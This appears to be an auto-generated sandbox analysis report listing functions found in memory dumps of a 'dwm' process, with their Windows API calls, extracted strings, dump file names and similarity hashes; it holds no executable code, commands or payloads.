Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: c5ffe1c465f459f895d9f757d1d87a7b48da7c64cef122a04913fb24b78c1974
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: D9214175B14B8883F7108B25F84876A73F0F389BA8F554215DA5942BACDF7EC149CB04

Function 0000026DB15C104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000026DB15C10AB
RegEnumValueW.ADVAPI32 ref: 0000026DB15C110E
GetProcessHeap.KERNEL32 ref: 0000026DB15C1155
HeapAlloc.KERNEL32 ref: 0000026DB15C1163
GetProcessHeap.KERNEL32 ref: 0000026DB15C1187
HeapFree.KERNEL32 ref: 0000026DB15C1195

Strings

d, xrefs: 0000026DB15C10CE

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: b211777bad8d4e9972588cf5136c4927e9e271737edffc2b3743247b2021ccd6
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: 5D417273614B84D7E7608F62E9487AAB7F1F388788F018125DB8907B58DF39D155CB04

Function 0000026DB15969F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000026DB1596A18
__scrt_acquire_startup_lock.LIBCMT ref: 0000026DB1596A6A
_RTC_Initialize.LIBCMT ref: 0000026DB1596A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000026DB1596ABE
__scrt_release_startup_lock.LIBCMT ref: 0000026DB1596AE9

Memory Dump Source

Source File: 00000018.00000002.2743999833.0000026DB1590000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db1590000_dwm.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: b893fcb06e2d661fbd63b9b1b7a83e24404f702c7a776363a0b714a0737def66
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: DD81C131F1028D86FB50AB269C4D3B966F5EB857CCF464025AA09437DEDB3BC94D870A

Function 0000026DB15F69F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000026DB15F6A18
__scrt_acquire_startup_lock.LIBCMT ref: 0000026DB15F6A6A
_RTC_Initialize.LIBCMT ref: 0000026DB15F6A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000026DB15F6ABE
__scrt_release_startup_lock.LIBCMT ref: 0000026DB15F6AE9

Memory Dump Source

Source File: 00000018.00000002.2744284775.0000026DB15F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026DB15F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15f0000_dwm.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 2cef070fa1fb0c1a6724bc96a087d6a01ddb94cc5977adf608eac8f3a99076c3
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 9581E631F0024E86FA509B26DC8D37967F0EB4578CF474429AA4543F9EDB7BC8468708

Function 0000026DB15C75F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000026DB15C7618
__scrt_acquire_startup_lock.LIBCMT ref: 0000026DB15C766A
_RTC_Initialize.LIBCMT ref: 0000026DB15C7698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000026DB15C76BE
__scrt_release_startup_lock.LIBCMT ref: 0000026DB15C76E9

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 8365de42946ef7b5008fe86676e1c428508fd5c71a0eda70c0f22b572063bb37
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: AA81E271F0028D86FB909F2A9C4D77A62F8AB4578CF0A80559A0487FDEDF7BC8418708

Function 0000026DB15C9804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 0000026DB15C9889
GetLastError.KERNEL32 ref: 0000026DB15C9897
LoadLibraryExW.KERNEL32 ref: 0000026DB15C98C1
FreeLibrary.KERNEL32 ref: 0000026DB15C9907
GetProcAddress.KERNEL32 ref: 0000026DB15C9913

Strings

api-ms-, xrefs: 0000026DB15C98A9

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: eb1cb1331f8bf70322539c4389247280a13e7dffa339ecebf8b4bc03216181eb
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 0831C235B02A8991EF119F12AC087BA63F4BB08BA8F5B4524ED2D0739CEF39C545C308

Function 0000026DB15D1B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 0000026DB15D1BCD
GetLastError.KERNEL32 ref: 0000026DB15D1BD9
CloseHandle.KERNEL32 ref: 0000026DB15D1BF1
CreateFileW.KERNEL32 ref: 0000026DB15D1C1C
WriteConsoleW.KERNEL32 ref: 0000026DB15D1C3B

Strings

CONOUT$, xrefs: 0000026DB15D1BFD

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 042f183bb11a4c8e844324c3b84d2c748b55f776c196af0957ac092105eee780
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: 86118271B14B8886E7508B57EC48B2972F0F788FE8F054224EA5D877A8DF7AC5048748

Function 0000026DB15C30B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000026DB15C30D7
HeapAlloc.KERNEL32 ref: 0000026DB15C30EA
StrCmpNIW.SHLWAPI ref: 0000026DB15C316B
GetProcessHeap.KERNEL32 ref: 0000026DB15C31D1
HeapFree.KERNEL32 ref: 0000026DB15C31DF

Strings

dialer, xrefs: 0000026DB15C3164

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: ef762082be70469285576cf51060e882a679152a7b293b57e12cda9b2d7ffaf3
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 2531C431B05B5D86EB91DF56EC4867967F0FB84B88F0640209E4807B58EF3AC6A1C708

Function 0000026DB15C1A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000026DB15C1A3A
K32GetModuleFileNameExW.KERNEL32 ref: 0000026DB15C1A58
PathFindFileNameW.SHLWAPI ref: 0000026DB15C1A67
lstrlenW.KERNEL32 ref: 0000026DB15C1A73
StrCpyW.SHLWAPI ref: 0000026DB15C1A86
CloseHandle.KERNEL32 ref: 0000026DB15C1A94

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: c39ff187dcc0e0e5f536a4fac76e9a776cafec51ff5b46d80a89babcd34eae69
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 30015B71B00A8596EA50DB63AC9876963F1F788FC8F494075CE8A43758DE3ACA85C384

Function 0000026DB15C37AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000026DB15C37C8
GetCurrentProcess.KERNEL32 ref: 0000026DB15C37D6
VirtualProtectEx.KERNEL32 ref: 0000026DB15C37F8
GetCurrentProcess.KERNEL32 ref: 0000026DB15C3819
VirtualProtectEx.KERNEL32 ref: 0000026DB15C383A
TerminateThread.KERNEL32 ref: 0000026DB15C3849

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: a9d0cfdf3a281f3295b48c65dfd1401d86175ad9b62f8c2ae94cbc503dca9694
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: 99116DB4B0278982FB609B62EC1DB2663F0FB48B89F050464CD4907768EF3EC248C708

Function 0000026DB15C90D8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000026DB15C9103
_IsNonwritableInCurrentImage.LIBCMT ref: 0000026DB15C9198
RtlUnwindEx.NTDLL ref: 0000026DB15C91E7

Strings

csm, xrefs: 0000026DB15C917E
f, xrefs: 0000026DB15C9116

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: fd3107367779c28201210c1b92fbae820553748f933bce5c812884519a3b69b7
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: 10518B36B116488AEB54CF15E84CB6977F6F384B8CF528124DA964778CEF36C941C708

Function 0000026DB15C1AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000026DB15C1AD8
StrCmpNIW.SHLWAPI ref: 0000026DB15C1AF2
lstrlenW.KERNEL32 ref: 0000026DB15C1B01
StrCpyW.SHLWAPI ref: 0000026DB15C1B16

Strings

\\?\, xrefs: 0000026DB15C1AE6

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: 31909a299ecda7a94a22d647d4a5cf6a54a4892b8af725065d02f0bf15318af3
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: D5F04472704689D2EB608F62FDD876967B0F744B8CF858060CA4D4A55CDF2DC788CB04

Function 0000026DB15C3200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 0000026DB15C3222
StrCpyW.SHLWAPI ref: 0000026DB15C3232
StrCatW.SHLWAPI ref: 0000026DB15C323E
PathCombineW.SHLWAPI ref: 0000026DB15C324C

Strings

\\.\pipe\, xrefs: 0000026DB15C3218

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: e84743f4e89460c603ff6c0aec795984c6940baca90cf5a9e8e55f832e295247
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 7CF08270B04BC892EE808F13BD0853962B1EB48FD8F098171DE5A07B2CDE2DC685C708

Function 0000026DB15CA138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000026DB15CA154
GetProcAddress.KERNEL32 ref: 0000026DB15CA16A
FreeLibrary.KERNEL32 ref: 0000026DB15CA187

Strings

CorExitProcess, xrefs: 0000026DB15CA163
mscoree.dll, xrefs: 0000026DB15CA14B

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: 06b6b6406f41cd5f300a45377c6ce31747c48fa02336624708355ecbbe4fa034
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: 33F082B1B2168891EF848F62EC8C77827F0AB88BC9F462019950B85668DF29C588C708

Function 0000026DB15D0860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000026DB15D08A2
GetConsoleMode.KERNEL32 ref: 0000026DB15D0960
GetLastError.KERNEL32 ref: 0000026DB15D09EA

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: d526ea1f6f3a823e4a9ca943e99befa5084ecf2fe588b0664762eb8867ec0e83
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: E981CF32F1069C89FB50AF629C48BBD27F0F744B8CF464216DE4A53799DB368481C329

Function 0000026DB15C57F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000026DB15C5806

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 9102385cd68f4d9137ef911baf5828c15806a251eaacc3be75e48e98500da15d
Instruction ID: d6f426a7fdb5f77fff859a7115a8cec3b84b64155f6915dcc6ce821137a7e9c3
Opcode Fuzzy Hash: 9102385cd68f4d9137ef911baf5828c15806a251eaacc3be75e48e98500da15d
Instruction Fuzzy Hash: 3061C976B29B88C6E660CF56E85872A77F0F389758F115115EA8D87BA8CF7DC440CB08

Function 0000026DB15A12B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000026DB15A12E0
_set_statfp.LIBCMT ref: 0000026DB15A12FB
_set_statfp.LIBCMT ref: 0000026DB15A1317
_set_statfp.LIBCMT ref: 0000026DB15A1353

Memory Dump Source

Source File: 00000018.00000002.2743999833.0000026DB1590000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db1590000_dwm.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: da99363393e5f528e167bf03ef0fb2507809969b3e54a8b7e2ee0afea74b34fe
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 3011A336FF4A0CC1F6641969EDEE37910F06B5437CF4B0626EB7606BDE8A6A8C49410C

Function 0000026DB16012B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000026DB16012E0
_set_statfp.LIBCMT ref: 0000026DB16012FB
_set_statfp.LIBCMT ref: 0000026DB1601317
_set_statfp.LIBCMT ref: 0000026DB1601353

Memory Dump Source

Source File: 00000018.00000002.2744284775.0000026DB15F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026DB15F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15f0000_dwm.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 233560325d177c6647b3c558e8c3ed17f4ab525f1b0894fe2e52707945bc3fd3
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: F5117332F54A0BC2F66C1165EDDE36912816B5B37CF4B462CBA7606BDE8A1ADC824180

Function 0000026DB15D1EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000026DB15D1EE0
_set_statfp.LIBCMT ref: 0000026DB15D1EFB
_set_statfp.LIBCMT ref: 0000026DB15D1F17
_set_statfp.LIBCMT ref: 0000026DB15D1F53

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 0d69400d34ae6f0df7d57b950c272b2f995d69a697693c64b3b196697282221a
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 34117772F54B8E81F6581167DCDDB7510F1AB7437CF0B46A4AA76063DE8B564C41831C

Function 0000026DB15984F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000026DB1598503
_IsNonwritableInCurrentImage.LIBCMT ref: 0000026DB1598598

Strings

f, xrefs: 0000026DB1598516
csm, xrefs: 0000026DB159857E

Memory Dump Source

Source File: 00000018.00000002.2743999833.0000026DB1590000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db1590000_dwm.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: fac96c093b7ac6db1a3a66b5be2caca39101a4a001f0d65babf6e02576babe37
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: B0518B32B1260C8AEB148F15EC48BA937F5F350BDCF668124DA1A4B78CDB36C845874A

Function 0000026DB15F84F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000026DB15F8503
_IsNonwritableInCurrentImage.LIBCMT ref: 0000026DB15F8598

Strings

f, xrefs: 0000026DB15F8516
csm, xrefs: 0000026DB15F857E

Memory Dump Source

Source File: 00000018.00000002.2744284775.0000026DB15F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026DB15F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15f0000_dwm.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 77dc6b3e6a1ef72f1456dd2c40b9823054b200f0a01f5be63d887cc4ee4c6610
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 43517B32F126098BEB14CF25EC4CBA937E5F764B9CF6281349A1647B8CDB36D8418708

Function 0000026DB15984D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000026DB1598503
_IsNonwritableInCurrentImage.LIBCMT ref: 0000026DB1598598

Strings

f, xrefs: 0000026DB1598516
csm, xrefs: 0000026DB159857E

Memory Dump Source

Source File: 00000018.00000002.2743999833.0000026DB1590000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db1590000_dwm.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 9178f7730ccf5d10352366ab890489981cd9bdc110fd7e89c8e4effef4afadb6
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: CC316B72B116489AE714DF11EC487A937F4F740BDCF668014AE5A4778CCB3AC945C70A

Function 0000026DB15F84D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000026DB15F8503
_IsNonwritableInCurrentImage.LIBCMT ref: 0000026DB15F8598

Strings

f, xrefs: 0000026DB15F8516
csm, xrefs: 0000026DB15F857E

Memory Dump Source

Source File: 00000018.00000002.2744284775.0000026DB15F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026DB15F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15f0000_dwm.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 8ee16709b8625b91776432ae5c253be3ceb42bee4f9ac3913381f6a4d6c4fb54
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 9C316D71B1165497E714DF16EC8C7A937E4F741B9CF268028AE5A07B4CCB3AC941C748

Function 0000026DB15C14B4 Relevance: 6.3, APIs: 5, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000026DB15C14D5
HeapFree.KERNEL32 ref: 0000026DB15C14E4
GetProcessHeap.KERNEL32 ref: 0000026DB15C14F0
HeapFree.KERNEL32 ref: 0000026DB15C14FF
GetProcessHeap.KERNEL32 ref: 0000026DB15C152A

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
Instruction ID: 2e5e68d70be1447c153d7868cef3dda12ca6c33c983a15425cc1f3da6a72ece1
Opcode Fuzzy Hash: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
Instruction Fuzzy Hash: 6B112E71A14B89D2E7549FA7E84862AB3B0F789B88F054069DB8A03718DF3DC151C748

Function 0000026DB15C26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000026DB15C27D4
StrCpyW.SHLWAPI ref: 0000026DB15C27ED

Strings

\\.\pipe\, xrefs: 0000026DB15C27DF

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: 6df21819b0741812e928cf36c0c523ab9ed34276efc7733dca6479babce5017d
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: E771AD32B0478D86EA649E2A9D483FAA7F1F744BC8F460026DE4A43B9CDF36C644C704

Function 0000026DB15C24DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000026DB15C25C3
StrCpyW.SHLWAPI ref: 0000026DB15C25DA

Strings

\\.\pipe\, xrefs: 0000026DB15C25CE

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
